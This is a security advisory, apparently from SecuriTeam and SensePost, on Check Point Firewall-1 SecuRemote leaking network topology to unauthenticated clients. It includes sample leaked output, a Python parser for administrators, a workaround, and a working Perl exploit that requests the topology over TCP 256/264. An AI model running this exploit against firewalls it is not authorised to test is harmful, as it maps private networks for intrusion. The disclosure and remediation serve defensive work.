Checkpoint Firewall-1 makes use of a piece of software called SecuRemote (a.k.a. SecureRemote) to create encrypted sessions between users and FW-1 modules. Before remote users are able to communicate with internal hosts, a network topology of the protected network is downloaded to the client. While newer versions of the FW-1 software are able to restrict these downloads to authenticated sessions only, the default setting allows unauthenticated requests to be honored. This gives a potential attacker a wealth of information, including IP addresses, network masks, and even friendly descriptions.
Credit:
The information has been provided by Haroon Meer. The workaround was supplied by Christian Herb.
The following script connects to the firewall and downloads the topology (if SecuRemote is running). It is a tiny Perl file that needs only the Socket module, so a Firewall-1 can be tested without the hassle of installing the SecuRemote client (or booting Windows).
Example:
SensePost# perl sr.pl firewall.example.com
Testing on port 256
:val (
:reply (
: (-SensePost-dotcom-.hal9000-19.3.167.186
:type (gateway)
:is_fwz (true)
:is_isakmp (true)
:certificates ()
:uencapport (2746)
:fwver (4.1)
:ipaddr (19.3.167.186)
:ipmask (255.255.255.255)
:resolve_multiple_interfaces ()
:ifaddrs (
: (16.3.167.186)
: (12.20.240.1)
: (16.3.170.1)
: (29.203.37.97)
)
:firewall (installed)
:location (external)
:keyloc (remote)
:userc_crypt_ver (1)
:keymanager (
:type (refobj)
:refname ("#_-SensePost-dotcom-")
) :name
(-SensePost-dotcom-Neo16.3.167.189)
:type (gateway)
:ipaddr (172.29.0.1)
:ipmask (255.255.255.255)
)
--snip--
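The reply is written in Check Point's nested ":key (value)" notation. The Python below is an added example, not part of the advisory or of SensePost's script: it parses that notation and lists, per object, the name, type, address, mask and interface addresses an unauthenticated client is handed, so an administrator can see exactly what the firewall exposes before applying the workaround below. The SAMPLE string is constructed from the output above with attributes trimmed and the second object given the same ": (name ...)" shape as the first; a truncated reply (like the --snip-- above) is rejected rather than silently half-parsed.

```python
import re
# Constructed sample modelled on the reply shown above (attributes trimmed; second object given the same shape as the first).
SAMPLE = """:val ( :reply (
 : (-SensePost-dotcom-.hal9000-19.3.167.186 :type (gateway) :fwver (4.1) :certificates ()
   :ipaddr (19.3.167.186) :ipmask (255.255.255.255) :ifaddrs ( : (16.3.167.186) : (12.20.240.1) )
   :keymanager ( :type (refobj) :refname ("#_-SensePost-dotcom-") ) )
 : (-SensePost-dotcom-Neo16.3.167.189 :type (gateway) :ipaddr (172.29.0.1) :ipmask (255.255.255.255)) ) )"""
# Tokens: "(" / ")", ":key" (a bare ":" introduces an anonymous list entry), a quoted or a bare value.
TOKEN_RE = re.compile(r'\s*(?:([()])|:([A-Za-z0-9_]*)|"([^"]*)"|([^\s()":][^\s()]*))')

def tokenize(text):
    tokens, pos = [], 0
    while m := TOKEN_RE.match(text, pos):
        paren, key, quoted, bare = m.groups()
        tokens.append((paren, "") if paren else ("key", key) if key is not None
                      else ("val", bare if quoted is None else quoted))
        pos = m.end()
    if text[pos:].strip():
        raise ValueError(f"unparseable reply at offset {pos}")
    return tokens

def parse_group(tokens, i):
    """tokens[i] is '('; returns (value, index just past the matching ')')."""
    i, node = i + 1, {}
    if tokens[i][0] == "val":                      # "(scalar)" or "(name :attr (...) ...)"
        node["_name"], i = tokens[i][1], i + 1
        if tokens[i][0] == ")":
            return node["_name"], i + 1
    while tokens[i][0] != ")":
        if tokens[i][0] != "key" or tokens[i + 1][0] != "(":
            raise ValueError(f"expected ':key (' at token {i}: {tokens[i]}")
        key, (value, i) = tokens[i][1], parse_group(tokens, i + 1)
        if key: node[key] = value
        else: node.setdefault("_items", []).append(value)   # ": (x)" entries collect into a list
    return (node or None), i + 1                   # "()" parses as None

def parse_topology(text):
    try:                                           # whole reply as nested dicts/lists
        return parse_group(tokenize(f"({text})"), 0)[0]
    except IndexError:
        raise ValueError("reply ended before every group was closed") from None

def exposed_hosts(text):
    out = []                                       # one record per object in the reply
    for obj in parse_topology(text)["val"]["reply"].get("_items", []):
        ifs = obj.get("ifaddrs") or {}             # ":ifaddrs ()" parses as None
        addrs = [a for a in ifs.get("_items", []) if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", str(a))]
        out.append({"name": obj.get("_name"), "type": obj.get("type"), "ipaddr": obj.get("ipaddr"),
                    "ipmask": obj.get("ipmask"), "ifaddrs": addrs})
    return out
```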
Solution:
Either block SecuRemote's ports (TCP 256 and 264) from untrusted networks, or upgrade to the latest version of Checkpoint's Firewall-1.
Workaround:
You can restrict the topology download so that only authenticated users can download it. Just go to Policy Properties, Desktop Security in your Policy Editor and uncheck "respond to unauthenticated topology requests". After installing the policy, only authenticated users can download the topology.
The only reason you would have to leave this checked is when your clients want to use FWZ encryption.
Exploit code:
#!/usr/bin/perl
# A command-line tool that can be used to download the network topology
# from a Firewall-1 running SecureRemote with the option "Allow
# unauthenticated cleartext topology downloads" enabled.
# Usage: sr.pl IP
# Haroon Meer & Roelof Temmingh 2001/07/17
# haroon@sensepost.com - http://www.sensepost.com
use strict;
use warnings;
use Socket;

if ($#ARGV < 0) { die "Usage: sr.pl IP\n"; }
my $host   = $ARGV[0];
my $port   = 256;                      # SecuRemote listens on TCP 256 (264 is tried as a fallback)
my $target = inet_aton($host) || die "Cannot resolve $host\n";
print "Testing $host on port $port\n";

# Hex-encoded topology request (decodes to a "(topology-request ...)" record).
# The pieces are joined with '.' so no newline characters end up inside the
# string before pack() turns it into raw bytes.
my $SENDY = "410000000259052100000004c41e43520000004e28746f706f6c6f67792d7265717565737"
          . "40a093a63616e616d6520282d53656e7365506f73742d646f74636f6d2d290a093a636861"
          . "6c6c656e67652028633265323331383339643066290a290a00";
$SENDY = pack("H*", $SENDY);

my @results = sendraw($SENDY);
if (!@results) {
    print "No results on port 256 - trying 264\n";
    $port = 264;
    @results = sendraw($SENDY);
    if (!@results) { die "Sorry - no results\n"; }
}
print @results;

# Open a TCP connection to $target:$port, send $pstr and return every line
# read back (an empty list if the connection fails).
sub sendraw {
    my ($pstr) = @_;
    socket(my $s, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) || die "Socket problems\n";
    if (connect($s, sockaddr_in($port, $target))) {
        my @in;
        select($s); $| = 1; print $pstr;
        while (<$s>) { push @in, $_; }
        select(STDOUT); close($s);
        return @in;
    } else {
        return ();
    }
}
# Spidermark: sensepostdata fw1